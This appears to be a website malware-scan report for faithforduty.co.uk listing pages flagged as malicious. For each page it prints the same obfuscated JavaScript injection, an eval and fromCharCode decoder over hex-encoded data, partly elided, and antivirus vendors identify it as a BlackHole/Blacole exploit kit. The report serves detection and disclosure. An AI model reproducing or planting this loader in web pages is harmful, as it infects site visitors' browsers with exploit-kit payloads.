Request | Server response | Status |
http://faithforduty.co.uk/ | 200 OK Content-Length: 9016 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://faithforduty.co.uk/index.html | 200 OK Content-Length: 9016 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://faithforduty.co.uk/news.html | 200 OK Content-Length: 25272 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://faithforduty.co.uk/summons.html | 200 OK Content-Length: 7885 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://faithforduty.co.uk/diary.html | 200 OK Content-Length: 8347 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://faithforduty.co.uk/events.html | 200 OK Content-Length: 8534 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://faithforduty.co.uk/history.html | 200 OK Content-Length: 24287 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://faithforduty.co.uk/latest.html | 200 OK Content-Length: 8229 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://faithforduty.co.uk/links.html | 200 OK Content-Length: 8393 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://faithforduty.co.uk/TGS/index.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 11:56:15 GMT Location: http://faithforduty.co.uk/TGS/indexx.html Server: Apache/1.3.33 (Unix) PHP/4.3.11 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug
| clean |
http://faithforduty.co.uk/tgs/indexx.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 11:56:15 GMT Location: http://faithforduty.co.uk/TGS/indexx.html Server: Apache/1.3.33 (Unix) PHP/4.3.11 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug
| clean |
http://faithforduty.co.uk/test404page.js | 404 Not Found Content-Length: 398 Content-Type: text/html | clean |
http://faithforduty.co.uk/contact.html | 200 OK Content-Length: 8369 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|